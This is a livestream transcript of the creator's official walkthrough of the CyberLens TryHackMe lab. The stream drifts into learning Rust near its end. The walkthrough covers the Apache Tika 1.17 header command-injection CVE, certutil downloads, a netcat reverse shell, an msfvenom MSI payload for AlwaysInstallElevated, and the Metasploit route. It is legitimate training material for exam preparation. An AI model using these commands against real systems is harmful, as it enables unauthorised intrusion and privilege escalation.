Showing off, don't wanna have to wait tonight. Wait tonight. Better off, I'm gonna find my way tonight. Wait tonight. Won't you talk to me? I wanna heal your sorrow. Won't you talk to me? We'll make a new tomorrow. Won't you talk to me? What makes this happy face? Showing off, don't wanna have to wait tonight. Wait tonight. Better off, I'm gonna find my way tonight. Wait tonight. Won't you talk to me? I wanna heal your sorrow. Won't you talk to me? We'll make a new tomorrow. Won't you talk to me? What makes this happy face do?
And it is time. What is up, everyone? Welcome back to HackSmarter Live. My name is Tyler. I am your host. And hey, super excited to have you take the time out of your day and learn with me. And do want to let you know I am live right now on 3 different platforms. So you can join on whatever platform works best for you. But I am live right now on Twitch, on LinkedIn, and on YouTube. On LinkedIn and YouTube, you can find me just under my name, Tyler Ramsby. And on Twitch, you can find me under HackSmarter. But either way, whether you watch on one of those platforms, I will do my best to keep my eye on the chat on all 3 different platforms, with one exception. Half the time, maybe not half the time, 90% of the time, LinkedIn doesn't show me the chat for some reason. So if you're on LinkedIn and you leave a comment or ask a question and I don't respond, I'm not ignoring you. It's just because LinkedIn's live platform is terrible, it seems like. But if you're on YouTube or Twitch, I see all those comments all the time, so I'll keep my eye over on there. Hey guys, don't know how long I will be live tonight. What I wanted to do was jump on and record the official walkthrough for the CyberLens machine on Try Hack Me. The CyberLens is a brand new machine created by yours truly. I'm going to show a few different ways of exploiting it, but I'm not going to post a standalone video till Monday just so we go through that 72-hour time. But I figured, hey, I can live stream a walkthrough because like I created the room, so I can do whatever the heck I want. So that's what we're going to do. I'm going to show you guys that CyberLens machine and a few different ways of exploiting it. But I'm going to start recording for YouTube real quick, and then we will dive into things. Here we go. Hey, what is up, everyone? Welcome back to another video. In this video, I'm going to give you the official walkthrough for the machine CyberLens on the TryHackMe platform. Now, CyberLens is a machine created by yours truly, and it is the latest machine on TryHackMe. And in this video, I'm going to show you how to exploit this machine and go through the machine two different ways. One way is I'll show you the Metasploit path, where you can kind of do everything in Metasploit with the interpreter shell and even elevate your privileges that way. And the other way is going to be a non-Metasploit path, which would be more like the OSCP. Now, this is an easy rated Windows machine, and it's not overly difficult. Don't have a bunch of rabbit holes for you, but it's very similar to the type of attack path you will encounter if you take the OSCP exam. Now, the thing with the OSCP, if you haven't taken it, the machines on the OSCP aren't overly difficult in and of themselves. What makes it difficult is that time crunch, right? You have those 24 hours to hack into multiple machines and then another 24 hours to write a report, and it's that mental exhaustion, that brain fog that makes it difficult. But each machine on its own is not overly difficult, and I wanted to make this machine to mirror some of what you're going to encounter either in the Pen 200 course or on the exam, kind of a common attack path and a common privilege escalation vector that you will see. So if you are prepping for the OSCP, encourage you to tune in, try this machine on your own actually, and if you get stuck, come back to my video. But here we go. Let's go ahead and dive into things. I will share my screen. Here it is, the CyberLens machine. Once again, it's the latest machine on TryHackMe, so it should be pretty easy to find, and it's free, so no subscription required. Here is the description. Welcome to the clandestine world of CyberLens, where shadows dance amid the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface. For here at CyberLens, we make metadata our playground. In this labyrinth realm of cybersecurity, we have mastered the arcane blah blah. I'll let you read that. It was ChatGPT who wrote that for me. I'll just be honest. I didn't write all of that silliness. But here's the idea. Can we exploit the CyberLens web server and discover the hidden flags? We have a user flag and an admin flag. Wait 5 minutes before starting to make sure everything boots up. And you do need to add cyberlens.thm to your Etsy host file. I have all the instructions right here. So let's first just do that, right? So we should just be able to just copy this command right here. And we'll go over to wherever my TryHackMe box is. There is my TryHackMe box, and I am going to do this on the attack box since it's the official walkthrough. I want to make sure I do it in the attack box so everyone is starting in a common place. So this is the web-based attack box on TryHackMe, but let's go ahead and add that to our Etsy host. We'll see if we can ping it now, cyberlens.thm, and let me turn off that silly beep that Ubuntu does real quick. And there we go. We are able to hit cyberlens.thm. Good to go. And the first thing we do is we do a in-map scan. So let's go ahead and do that real quick. We'll do just a basic in-map scan on the most common ports just to see where we should begin our enumeration at. So I'll do in-map. I'll type in cyberlens.thm and T5 to make go fast. We know it's up, so we can ignore host discovery, and -V for verbose mode. And right away, we see a few things that should stand out to us. We have a web server running on port 80. We have 445, 135, 139, so SMB type stuff going on there, and 3389 for RDP. So right away, just based on the ports that are open, we know that we are dealing with the Windows machine. So if you didn't know it was Windows, you would know it now. I'm going to drop this over here so it's out of my way. But we are dealing with a Windows machine. Now, typically when I do a CTF, I scan all the ports, and we'll see what's on all of them. But just for the sake of time, I'm just going to do the top most common ports, and I'll show you how we can discover what we need to find as we dig into this web server. So there's all these other ports, but often, especially if you're on something like the OSCP and you see that a web server is open, there's a good chance that web server is going to be the way to get into there. So we have a web server on port 80. Let's just go ahead and check out this web server and see what might be running on that. We'll go to cyberlens.thm. And here we are, my beautiful web server, right? If hacking doesn't work out, I'll become a web developer. But here is CyberLens. We have our CyberLens image extractor, which looks interesting since it takes file uploads. Do we have anything on our contact us page? Not much. CyberLens image extractor goes to this. So it's pretty clear just by going this that, hey, we need to do something with this CyberLens image extractor. And I don't think there's too many images on the attack box. I'm just going to save image as, and we'll save it. Yeah, that's fine right there. Save. And let's go ahead and browse and grab that image we just downloaded, that about image right there. And we will click get metadata and just see what happens. All right, so it does what it says it does. When you click get metadata, it gets the metadata out of the image. You can kind of see it there. So then what should make us curious, I'm just going to refresh this page. We'll jump back over here. You could do this with Burp Suite, but if you don't want to open up Burp Suite, we can just go to more tools. We can go to web developer tools. And if we go over to network, we can see, hey, what network call is happening when we get this metadata. So let's do this again, but let's monitor it down here to see what network call happens. We'll do get metadata. And we can see what should stand out to us. It's making an options and then a put request to some service running on port 61777. Now, if we go back to our Nmap scan, which it looks like I closed out the Nmap scan, 61777 is not a common port. So if you just did a typical Nmap scan like I did in the beginning, you are going to miss this port based on your scan, which is why it's so important on CTFs or things like the OSCP where enumeration is key that you do -P- so you scan all the ports, not just the most common ones, because you might miss something hidden on an uncommon port. But we have this on 61777, which is the request it's making to get this metadata. So let's go ahead and see what is running on there. So I'll go to cyberlens.thm 61777. And we have Apache Tika 1.17, which must be, if we're following through that, hey, this is the information this is how it's pulling that metadata service information out. So let's go ahead and research about this, shall we? Whatever. It's not even my machine. And let's do like exploit. Okay, well, we have Rhino Security Labs, and those of you who know me know that I work at Rhino Security Labs, so if you find a CVE that comes from Rhino, you know you're probably in the right spot. But I actually want to take some time to go through this blog post because I think this is a really cool blog post written by my friend David Yeslin, or Dave is what he goes by. He is a senior pen tester at Rhino, the lead of the pen testing team. I actually meet with him every single week for one-on-ones. Really genuine, solid human being. But one cool thing here is he did not discover the CVE, but he reverse engineered the CVE, which is one thing that you can do for security research. If you don't find CVEs, you can find a CVE that doesn't disclose the details and then kind of reverse engineer it and write a POC for it, which is exactly what he did. So before we even dive into this, I want to go through this blog because I just thought it was cool how we discovered this. So let's go through this. This post is a walkthrough of steps taken to go from an undisclosed CVE for a command injection vulnerability in the Apache Tika server to a complete exploit. The CVE is this, so here's the information he had to go by. Apache Tika 1.7 to 1.17 could send carefully crafted headers to Tika server that could be used to inject commands into the command line of the server running Tika server. This vulnerability only affects those running Tika server on a server that is open to untrusted clients. The mitigation is to upgrade to 1.18. So that is the information that he initially started with. So what is Apache Tika? Well, it extracts metadata. We kind of saw that by using it on the website, the CyberLens image extractor. And it has a few different components, a Java library, a command line tool, and a standalone server with its own REST API. So breaking down the CVE. So to start looking for the issue, we need to, of course, read the CVE advisory and see what information we have, which we just read that. We have some information there from it. And things we can tell from the description. 1.18 is patch. 1.17 is unpatch. The vulnerability is command injection. The entry point is some type of headers, and it affects the Tika server portions of the code. With this info, we now have a starting point to try and identify the vulnerability. The next step would be to perform the diff of the patch and unpatched versions of Tika, specifically the Tika server portions. Grepping the code for functions in Java known to perform operating system commands would be another good place to look. Finally, searching for sections of the Tika server code which relate to interpreting headers from what we can assume will be some kind of a HTTP request. Like, this is so cool to me that he took this CVE with not much information and pulled down the code and then created a POC for it. Like, blows me away. But this is what he did. He did a side-by-side recursive diff of 1.7, remember, or 1.17 vulnerable, 1.18 patch, and there's only one file that has been modified. And this is the one file that's been modified. You can see the modification made. And since the goal is to find command injection in a header field, having the first result be a code block, which has been added in the patch version called allowable header characters, right? That's a pretty good start. The assumption is that this is some kind of patch trying to filter characters, which could be used to inject commands into the target field. So continuing down is a large block of code inside of a function called process header config, which looks interesting and has been removed or changed in 1.18. So another difference between our vulnerable code and our patch code. It is using some variable to dynamically create a method which appears to set properties of some object, and it uses the HTTP headers to do this. So Dave knows, like, hey, I'm looking at the right area. It talked about headers. It talked about command injection. We are unraveling the mystery of the CVE to try to get a POC put together. And here's the description of the function. The code or objects that the property on, the key of the HTTP header, name of the HTTP header. So we have more header information. The prefixes for the different properties were shown in the previous screenshot and are defined as static strings at the beginning of this code, right there. So we have a couple of static strings that can be included as HTTP headers with a request and used to set some property of an object. An example of the final header would look something like xtika OCR some property and some value. Some property then gets converted to a function that looks like set some property and is invoked passing some value to it as the value to set. A little bit confusing, but hopefully we're tracking a little bit. We see these headers, and this is where we might be able to get command injection in. So here you can see this function is being used and where the prefix header is checked in the request to determine how to call the function. All the needed arguments are then passed in from the HTTP request to the process header config. So we have user input. Looking at the way process header config function is used, you can see the properties are being set on that object. Doing a search for places that may use that, we find this, which turned out to be pretty interesting. Here is the do OCR function from that, which is passing the config properties from that object. I know, confusing, we'll get through it, which we just discovered directly into an array of strings, which are used to construct a command for process builder, and then the process is started. So hopefully you are tracking how this might get to RCE. So this looks promising. If we put together all the information we have found so far, we should technically be able to make some kind of HTTP request to the server, set a header that looks for this, and have this command be inserted into the command string and be executed. The only problem is the config get tester path is prepended to another string we cannot control, which ends up being a static string. To fix this, we can wrap our command we want to execute into double quotes, and Windows will ignore whatever is appended to it after the quotes, just executing our injected command. To put this to the test, we can just use an example from the TK server documentation for retrieving some metadata about a file, right? So he goes through and tests this to do your default POC of launching calculator, and it works. But can you do more than pop calculator? Now, I'm not going to go through the rest of this, would encourage you to check it out, but he talks about how really looking through here and using some like lol bin type stuff, living off the land, and how we can inject more commands than just the calculator, and eventually with cscript.exe, which is a common thing in that area with lol bins. With that, you can do any command you want, and then there's of course a POC for this right here. Now, here's a part that is very realistic to the OSCP. You have an exploit that's going to be your initial way in, but here's the thing. Not even on purpose. Well, initially the exploit didn't work. So here was the exploit. Originally, it was written in Python 2, and it would just fail because it was Python 2 and it was old. I updated it to make it Python 3, but I screwed up the formatting when I did to Python 3, and I just realized it today when I was checking things over. So if you try to run this right now, at least I'm pretty sure, it will not actually work. It will fail, And you'll often encounter this on the OSCP, that you'll find an exploit, it will be the way in, but the one you find will fail, so you have to do a little bit more digging. Well, on this example, someone who I'm guessing went through the box did a pull request, and they said, hey, go ahead and update it with these changes, right? Fix lines 41 to 44 and fix line 44, and updated lines that use Python 3. And this one does actually work. We can go ahead and just jump over to his patch and check it out. And honestly, when I'm done with the stream, I think I have permission to approve the patch, and I will go ahead and approve this so it goes to the official CVE list. But here is the one that this person updated. Once again, I'm guessing as they were going through this machine, because I think this pull request is from recently. So I'm going to go ahead and copy this, and we'll go over to our terminal. Do I already have the terminal open? I do. Do I already have two terminals open? I do. All right. We'll just use this terminal, and we'll do nano exploit.py, paste our code in here, save it. And what I'm showing you this first time is the manual way of exploiting the box. The manual way takes a little bit longer. When we're done with the manual way, I'll show you how you can do this in like, I don't know, 5 minutes with Metasploit. But I think it's always good to understand the manual way, especially for those of you studying for the OSCP. So let's try to run it and see the options we are given. So it says, hey, run this. We want to hit our target localhost for testing, and then our target port, and then whatever command that we want to run. So let's do Python 3 exploit.py. Ours would be cyberlens.thm, and 6177 is where it's hosted. But what command do we want to run? Well, ultimately, our goal is to get an initial reverse shell, and one good way to do that is with netcat.exe. So let me go ahead and open a new tab, and I will do locate netcat.exe. We have in a few different places. I'm going to make a directory called web server, cd into web server. And for those of you who don't know, at least the paid version of the attack box actually has a public IP. And when you host a basic Python web server, you're actually putting this out on the internet. So whether you're using the attack box or a command and control server that has a public IP, it's always helpful to make a separate directory for a web server and make an index.html, even if it's blank. So I'm going to do that, touch.index.html. So we have one. And now I'm going to copy from root downloads netcat.exe to this directory, and now we'll host a very simple Python web server on port 8080. And let's jump back over to here. We need to do a command right here in order, and there's multiple ways you can do it. Noxlumen said, I use a base 64 encoded PowerShell from RevShells. Yeah, so there's a bunch of different ways you can do this, but I know one of the ways, or one of the primary ways it teaches on the OSCP is netcat is a big thing. So I'll show you guys the netcat way, but you have full RC at this point. So there's a bunch of different ways you can end up getting this shell, but here we go. I'm gonna do cert util URL cache -f, and then we're going to give it our attack box IP 10.10.249.174, port 8080, netcat.exe, and then we need to save it to a place that we know we can write. And on a Windows machine, a good spot to guess might be C users public netcat.exe. That always, not always, let's just say 99% of the time, this works for me when I'm doing a CTF. I can write to that folder on a Windows machine, make sure our web server is running, which it is, and let's go ahead and hit enter. Now we should get a hit on our web server, which we got like 4 of them, so I'll take that as good. Like it hopefully downloaded it. And now let's set a netcat listener. Every good hacker, of course, uses port 1337, so we will as well. And now we're going to change our command up a little bit. So to get our reverse shell, we're going to do, I believe this is the syntax. I always mess up the syntax, so I might mess it up again. But we're going to give it our attack IP that we're listening on, so 254.9.174, our listening port, and then we want to launch command.exe. I think that's the syntax. We might have to Google it, fingers crossed. I don't know why I always forget that very simple netcat syntax. Okay, looks like I did. Did I do the syntax wrong? Cert util URL cache -f netcat.exe c users public netcat.exe c users public. Did I do it wrong? Okay, I hate this aspect about this. Let me see if I can fix my settings real quick. 1 second. How do I edit the freaking dock settings, bro? No, I don't want to edit. I just want to edit the dock itself. I just want it to stay. Okay, whatever. I'll just go over here and click it then. Alright, let's see if my syntax is wrong. It probably is. Close out, close out. Nope, my syntax is correct, isn't it? netcat.exe our IP that dash e cmd.exe. What am I doing wrong? Here's my little cheat sheet. Am I doing something wrong? See, I don't think so. What the heck? It's my own machine and I can't even exploit it. Alright, let me look at it. I must have something wrong in my syntax. Cert util URL cache dash F. We have that. And then we're putting in C users public. Oh, my slashes are wrong, I think. It's reading my slashes incorrectly. Here's what I mean. This right here, I think because of how the exploit is written, we need our slashes to be that way. Let's see if I'm right. Try this again. All right, now let's go ahead and open up our listener. And now we'll go back to this. I'm going to change my slashes around here. Fingers crossed. Boom. All right, that's all it was. My slashes are just wrong. So who am I? We are now the CyberLens user. So we can go to CD users. Here, let me see if I can make this a little bit bigger for you guys. All right, that's better. And if we dir it out, we can CD CyberLens, dir, CD desktop. All right, there's user.txt. Although I'm not going to show you user.txt, I will make you work on your own to get user.txt, but there it is. So now we need to figure out privilege escalation. And one common thing to do when you're doing the OSCP is to run something like WinPs and see if there are any common escalation vectors here. So let's go ahead and do that. And first we need to get WinPs. I'm going to open up, we'll do it here. Well, let's go to our web server first. CD web server, locate WinPs. Do we not have it on here? Is there not? How about here? Do not actually have. Oh, there's bin. Maybe it's in bin. There's winps.exe. All right. I just wasn't sure where it's at on the attack machine. Oh, whoops, not ls. I meant to see copy it. Let's try that again. All right, there's winps.exe. Let's go ahead and upload that to our machine now. Python 3. Host a basic web server again. Go back to our shell right here, and we'll do cert util URL cache.f attackbox IP 10.10.249.174.8080 and winps.exe, and we'll do C users CyberLens desktop winps.exe. All right. We'll let this run for a little bit. Let me look over at chat and make sure I'm not missing anything. Malware comment said, trying to follow, but I missed the beginning. I don't know when you posted that, but I think you may have posted it right in the beginning, so you didn't miss a whole lot. I was just giving some background on the exploit that I'm using for the machine. Malware Combat said, so not ready for OSCP. Yeah, I don't know if you are or not. That'll be up to you, my friend. I will say, like, this is a pretty easy machine overall. So if you got like fully stuck on this machine, you may want to do some more practice before the OSCP. Doc Money said, I didn't get the notification, went live. What's on the menu tonight? Hope you're well, man. I am doing the official walkthrough for my CyberLens machine I created. At least a live stream. I'll release it in a few days. But let's see. I'm actually curious if this will find the privilege escalation path. I mean, it should, because it's a super common thing that you're taught on the OSCP and like every other course. Oh. My, the history, the freaking terminal history is set so it's not showing me all the background. Let's see if this is going to show me the privilege escalation path. Otherwise, I'm going to have to change the terminal history so it shows us everything. As you saw, we didn't get the beginning of WinPeas. Oh. All right. So you can see it right here. If you're going through the WinPeas results, this is what should stand out to you. And when you're doing something like the OSCP, this is a very common privilege escalation path that you may discover on the exam, or you're going to discover on other CTFs. And it's when always install elevated is enabled. You can see it's set to 1 in both places, which means, all right, let's check this out. If we didn't know what that is, let's go ahead and read about it, right? So we'll go ahead and copy this link, open up Firefox, which I already have open. We don't need to open it again. Right here. And let's check this out. What is always install elevated? All right, there we go. Oh, always. There. Oh, that's to enable it, but we already have always install elevated. I don't know why it doesn't just explain it here. Let's look at it this way. Maybe there's a better article that explains this. Okay, always install elevated, a functionality that allows a regular user to install MSI files with high privileges, right? So it doesn't install under our current user. If we pull up our terminal here, an MSI file is a common file in Windows for installing Microsoft Service. I think it's Microsoft Service Installer or something along those lines. And if always install elevated is enabled, what it means is when we install an MSI, like right now, if we do who am I, we are the CyberLens user. If we do who am I priv, we don't have any special privileges. If we do net user CyberLens, you can see we're part of the remote desktop user, so we could RDP, and we're part of users, but we're not part of admin. If we do net users, the other one is administrator. That's what we want to compromise, right? So our current user is not an administrator, but when always install elevated is enabled, it means if we're able to install an MSI, it's going to install the MSI from NT system authority privileges. So anything we install is going to be executed from a system level. And with that information in mind, there's actually a lot of different ways you can exploit this. And that's just showing where you can see it at and exactly how you can do it. You can create a reverse shell that does it right here, and it will give us a reverse shell as NT system authority. So let me go ahead and just show this to you. Hengi said, hi, am I too late? I was doing the room and stuck at Privest. No, you're right on time, my friend. We're right to the privilege escalation path. So you're right on time. So let's go ahead and do this. MSF Venom is allowed on the OSCP. Metasploit is technically allowed as well, but only to use one time. But MSF Venom for creating payloads, you can use as many times as you want on the OSCP. And we have a payload right here. So let's check this out ourselves. Go back to here. Go back to our web server. And type this in. And you can see what it's doing. We're doing MSF Venom, the platform Windows, x64, and here's our payload. We want to get a reverse TCP shell, so not even an interpreter shell, but just a TCP shell. And port 1337, that's not going to work for us because I'm already using that port. We'll do port 444. Our L host is going to be our listener. So let's go ahead and do this. 10.10.249.174. We don't even need to encode it because there's no EDR on the machine, but we'll just do that and see if it works. While that installs, let's continue to read. So you can see they have a little demo here. Oh, they have RDP access. I'm trying to think of, it's MSI exec. Let's check this out. Just the command line thing. So this is showing how to set it up in your own lab, blah, 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 blah. How you can see if it's enabled. And another thing right here, right? This is a Meterpreter shell. We're just doing a standard TCP shell, but that'd be another way to do it is Meterpreter. But if you're doing the OSCP, right, that would require Metasploit. There's the command I was looking for. All right, let's go back to our terminal. And our always install elevated is done. So we'll go back over to our shell here, and we'll do cert util URL cache -f, grab our IP of our attack box 249.174, port 8080, and then honestly, is it just called always install elevated? I'm gonna mess that up if I try to type it, so I'm gonna copy it, jump over to this, and we'll save it to users, CyberLens, desktop, always install elevated. A connection with server cannot be established. 10.10.249.174.8080. Oh, you know, it would probably be helpful if I actually hosted a Python web server when I tried to, you know, download files from there. Let's try that again. Of course, that's not going to work. We'll copy this. All right. Now we have the always install elevated there, and we use port 444, right? All right, so we'll do netcat mvlp 4444, set up our listener, and if we go back to that article, we can see the exact syntax for running this. It is this right here, and then we'll give it the MSI. So I'm going to copy that, go back over to our terminal, go back over to here, and we'll do that. Always install elevated.msi. Fingers crossed. Who am I? And you can see we are now NT authority system, so we can do cd users, dir cd administrator, cd desktop, and there is the admin.txt flag. I'm not going to read it for you on stream. Would encourage you to do that on your own. So that, my friends, is the manual way of going about this room. And now I'll show you how to do it the Metasploit way, which is super quick. Like, you'll be amazed how quick the Metasploit way is. But of course, in the OSCP, you can always only use a Metasploit once. But let me show you that process real quick. We'll just exit out of all this. Exit out of this. Exit. All right, and now let's do MSF console-key. Q that just means to open it in quiet mode. And we'll be able to do this. I'm looking at my timer. I bet in 5 minutes, maybe we can exploit this entire machine in like 5 to 10 minutes at the most with Metasploit. Longest part is just waiting for Metasploit to open. There we go. So we can search Apache Tika. I spelled that wrong. Search Apache Tika. Use that. Options, set our host cyberlens.thm, set our port 61777. Everything else looks fine. We can set an L port to 4443. Run. So this is just everything we did manually when I uploaded netcat and everything. That's what Metasploit is doing for us right now. It's going to give us a full Meterpreter shell. There we go. Get UID. You can see we're CyberLens. Now watch this. I'm going to background this. I'm going to search for always install elevated. I'm going to use that. If we look at our options, it takes a session. So let me just do sessions. All right, so we have one session. We'll do set session 1. We'll do run. Get UID. And now we're NT authority system. What did that take me? I think that took me 4 minutes. So that is the Metasploit way instead of the manual way, just showing how Metasploit can really automate this attack path and give you NT authority system quickly. So once again, not a hard machine. I made this an easy machine on purpose, but it really does show what you will encounter on exams like the OSCP. So if you went through this machine and you are struggling with it, I would encourage you brush up on your Windows privilege escalation, your Windows attacks, before you maybe sit for the OSCP, because it's a very common type of attack that you will encounter. So hey y'all, hope you found this video helpful. Let me know in the comments what you thought about this machine, any feedback that you might have, and would love to hear from you. But thank you for watching. I will see you in the next one. There we go. Yeah, isn't that crazy? Like the Metasploit one is so fast. If you do the Metasploit way. You just background it and now you are into authority system. Exit out of some of this stuff. But all right, y'all, that was my only plan for the stream. I just wanted to make sure I got this recorded so I could get it ready to be uploaded to YouTube. So I don't have any other plans for the stream. I'm probably not going to hang around super long, unless you guys want to see me work on Rust. That's kind of what I've been doing, just trying to figure out how to learn Rust. But it's not not super interesting, to be honest. Let me close my shells out here. Close this out. Oh, you've been reading the Rust book, Daily Disclosure? What do you think about it? I don't even know if I have this computer set up for Rust. Give me just a second. I was doing all my Rust stuff on my other computer. Well, like wasn't even doing it on a virtual machine. Like my other computer, my main computer I use to like work and stuff is Ubuntu. And Ubuntu just works a lot better for any development type stuff than Windows. So that's where I was doing all my Rust stuff at. I'm just closing all my Try Hack Me stuff real quick. Am I writing a tool in Rust to practice? Not yet. I'm literally just learning the very basics of Rust. Is all I'm doing. That's why I mean it's not super exciting to watch. It's just me learning. It probably fit more with like a study with me style video where I just like learn Rust. You guys can study with me in the background. But let me first just see if my VM has Rust installed. If not, we can install it. And this won't even become a YouTube video either. This will just be a live stream exclusive. But how's everybody doing, y'all? It's Saturday night. You guys are sitting in front of your computer, so welcome to the club of not having a life. Good to have you here. Hope y'all are having a good weekend. I spent, man, like all day today outside with my kids. We did a lot of stuff. Hey, I got a second subscriber on Twitch. Amazing. Reckless Gizmo. Thank you, my friend, for the subscription. Good to have you here. You joined Hunterbot there. And yeah, I will say, like, I always forget to mention this, but if you appreciate what I do and you want to support my content, I don't believe in paywalls, so there's no paywalls for anything I do, and you don't get anything special by becoming a member, because once again, I don't want to put a paywall on anyone else. But you can support me in a few different ways. On YouTube, you can do a super chat, a one-time donation. You can also become a member on YouTube at basic membership or super membership, $5 or $10. And then over on Twitch, you can subscribe on there. And we just got another one, Daily Disclosure, just subscribed. Thank you, my friend, for subscribing over on Twitch. I really do appreciate it. But do I have Rust? Don't think I have it installed. All right, we can go ahead and install it though, I guess, on this machine. Let's open up Visual Studio Code real quick. And I'm thinking if I go and if we go up to this terminal, new terminal, blah, blah, blah. Whoops, I didn't mean to do that. Reckless Gizmo said, you indirectly helped me solve an easy hack the box machine. Subbing was a no-brainer. Well, thank you so much. I appreciate it. I'm recording my Rust journey on GitHub. At least I think it is. Yeah, here we go, learning Rust. Right, literally all I made so far is a sweet guessing game. I guess I can show that to you guys. It's not that awesome. We got another one. Bottleneck subscribed. Thank you, Bottleneck. I really appreciate it. Thank you, my friend, for becoming a subscriber over on Twitch. All right, so here's my guessing game. See, amazing guessing game. The secret number. Oh, I forgot to even change the code. I was supposed to. It's not supposed to tell you the secret number. That was only when I was making it so I could see the secret number while I was testing it. Because then, like, if you do, let's say 15, it will say you guessed 15 too small, so we know we have to go higher, right? And if we did 50, it'll say too big. But if we do 28, it says you win, right? That's my very, very simple guessing game. And each time it's a different random number. But yeah, you're not supposed to include the secret number is in the final code, only in development. So I'm not a developer, like, so far from it, but I like dabbling and learning things. So that's why I'm trying to figure out Rust here. I even put my little bookmark here in the README to figure out where I'm at. So that's the book I'm doing. But we need to, like, before I do anything, install Rust. All right. Run the following terminal, follow on-screen instructions. All right, YOLO. All right, enter. See if this works for us. I don't think it should take too long. Don't even know the last time I installed Rust. I put it on my other computer a long time ago. Copy that. There we go. We got Rust installed. Beautiful. Let's open up our Rust folder. We can open up Learning Rust. All right. You know, one thing that might be helpful for me is just explain my code. See if I can explain it. If we go to source here, main. All right. So here's the code for our guessing game. Let me turn on word wrap. Why can't I zoom in? There we go. That's almost too much though. Oh well. We'll zoom in a little bit, right? So the top here on Rust, well, you can see I even added comments so I know what I'm doing. But the very basic guessing game. The first thing we're doing is from our standard library, we're using input-output, right? IO library from the standard library. And then we need to order. This is how we're comparing our numbers. So from the standard library and from the comparing library, we're using this ordering function is my understanding how that is. And then for the random stuff, we're using our random function from a standard library. All a Rust code begins with the main function, like that's pretty normal. We're not passing it any parameters, that's why that's blank. And then we have our opening curly bracket. And the first thing it's doing, even if you know Python, you know what's going on. Oh, hey, Jacob, dude, thank you for the super chat, my friend. Appreciate that. Thank you for your support. But if you know Python, very similar here. So we're doing a print line function, and we're just outputting to the screen, guess the number. And now we're generating our secret number, right? So this is the part that Rust is a lot more difficult than things like Python. It's more of a legit like programming or developer type stuff, but you can understand a little bit what we're going on here. So we're saying let, so we're setting a variable, and we're setting a variable called secret number. And from the secret number, this part's confusing to me when I'm trying to like fully understand this, but from our random library up here, we're using this thread RNG, thread random generator or whatever, and we're generating any number between 1 and 100. You can see my comment there. And then we're setting a loop so that it loops through here until the user gets the right number. So it says, please input your guess. And now we're creating a variable called guess, but here's a part that's a little bit confusing. We have to do this mute here to make it mutable. In other words, so that each time the user gives a different guess, it updates the variable. By default, I believe every variable in Rust is immutable, but we need to specify that it's mutable. And then we're setting a new string, right? We can see the new there, and it's going to be a string. Create a mutable variable to store user input. And now we're reading it. So our input output library out here from the standard library, we're reading the line. Read line, I mean, that's similar to Python. We're reading whatever the user guesses, right? We're reading that from the standard input. And this little ampersand things mean it's a reference, which I think we're going to get to later on in the book. But it's just how Rust works. We're referencing this variable up here. And if it doesn't work, it's going to say, hey, failed to reline, and it's going to, I think it's going to catch the error. I don't think this is actually the final guessing game. I bet what happened is when I was doing this on my Ubuntu machine, I didn't commit the final update, which is why it's missing some of the stuff, like including this right here. Here's another thing that was confusing. When you ran it initially, you got a type error because the user is guessing and it's a string. And down here, you're trying to compare a string to a number, which of course you can't do. They both have to be the same value. So that's what we're doing here. We're converting our guess variable, U32, right? A way to say, a confusing way to say a number, integer. And what we are doing here is we are trimming any white space because a string's going to have white space. Even when you type it in and hit enter, it's going to add a new line to the string. And of course, a number can't have a new line. So we're trimming it and then parsing it, converting it to another variable. And then you can kind of figure out the flow of all this. If the number is okay, in other words, if it's an actual number, so if you type cat, it's going to fail because that's not an actual number. But if the number is okay, then we're good to go. It will continue. And here's the line that is giving us our secret value, right? We don't want that. And then this is just the comparing, right? If it's too small, it'll be too small, too big, and it will say you win. And now that I fixed it, we can try to actually play the game and see if we get it. Let me pull my terminal back up here. And we'll go into our guessing game here, and we'll do cargo build release. All right, so now if we go to our source, or not source, target, release, we should see a new one here. Guessing game. All right, look, I fixed my code, y'all. I updated it so it doesn't show the secret number. So please input our guess. Let's just start with 50. So 50 is too big. We can jump down to 40, 30. So 30 is too small. So 35 is too small. 38 is too small. 39. There, I win on 39. And hey, we did fix our code, so we can go ahead and commit this. Oh, I haven't actually configured anything? All right, screw it. I'll do that later. I thought I was authenticating everything, but apparently not. Here, 1 second. Let me see if I'm authenticated even to Git. Let's see. Oh no, I need to get logged in on here. Give me just a second, y'all. No, I think I am. Do I just need to add my stupid name thing? Hold up. Just gonna set up my git config real quick, then I'll go back to share my screen. All right. Now we're good. Boom. We fixed my code and we committed it. So beautiful. We're already doing something. We already accomplished something. Pat ourselves on the back there. We fixed my bad Rust code on my bad guessing game. We recompiled it and we're good to go there. Let's jump into our learning now. Oh, do I just get another freaking sub? Amazing. Multiple subs. Thank you. All over on Twitch. Thank you, Not Lad. Not Lad 0807 is also gifted a tier. It's her first gift sub. Sent a tier 1 sub to Lawfully Birdie. Amazing. Thank you all. Really appreciate it. All right, guys. So once again, I wasn't even going to stream this because this is just me trying to learn Rust. So this probably isn't going to be super exciting, but hey, I'm on stream, we'll hang out, and we'll see if we can learn it together. I don't even know what we're learning today, but let's find out. This is where I'm at in the book. Oh yeah, okay, bet. Let me see if I can make this a little bit better. Like that. And then I don't know what we're going to be doing. I wonder if I'm going to need maybe a new folder. Well, let's just see what happens. All right, we're back to learning Rust. And I'll zoom in on the book right here. So common programming concepts. Hey, what up, Leon? Good to have you here, my friend. This chapter covers concepts that appear in almost every programming language. So I'm guessing we'll talk about loops and stuff and how they work in Rust. Many programming languages have much in common at their core. None of the concepts in this chapter are unique to Rust. We'll discuss them in the context of Rust, blah, blah. Variables, basic types, functions, comments, and control flow. All right, let's dive in. Variables and mutability. So it's a little bit about what I was talking about when I was showing you some of those variables. As mentioned in the storing values with variables section, by default, variables are immutable. This is one of the many nudges Rust gives you to write your code in a way that takes advantage of the safety and easy concurrency that Rust offers. However, you will have the option to make your variables mutable. Let's explore how and why Rust encourages you to favor immutability and why sometimes you might want to opt out. When a variable is immutable, once a value is bound to a name, you can't change that value. To illustrate this, generate a new project called variables in your project's directory by using cargo new variables. All right. Cargo new variables. All right. And we'll go ahead and open up variables here, source, and our main RS. All right, then in your new variables directory, blah, blah, replace it with the following code, which won't compile just yet. And like anytime you are learning Rust or any programming language, although you can copy and paste, it's always best to type it out. You want to build that muscle memory. So I'm going to go ahead and type out this code and explain what I'm doing just for my own learning, honestly. So we're setting a variable. So we're saying, hey, let x equal 5. And we're doing print line. So we're printing something. The value of x is, if you guys notice, like, you see how it's trying to fill this in? This is GitHub Copilot trying to help me with my code. But GitHub Copilot's awesome, but not awesome for learning, like, because I want to do it manually, right? And then x equals 6. So we're changing x 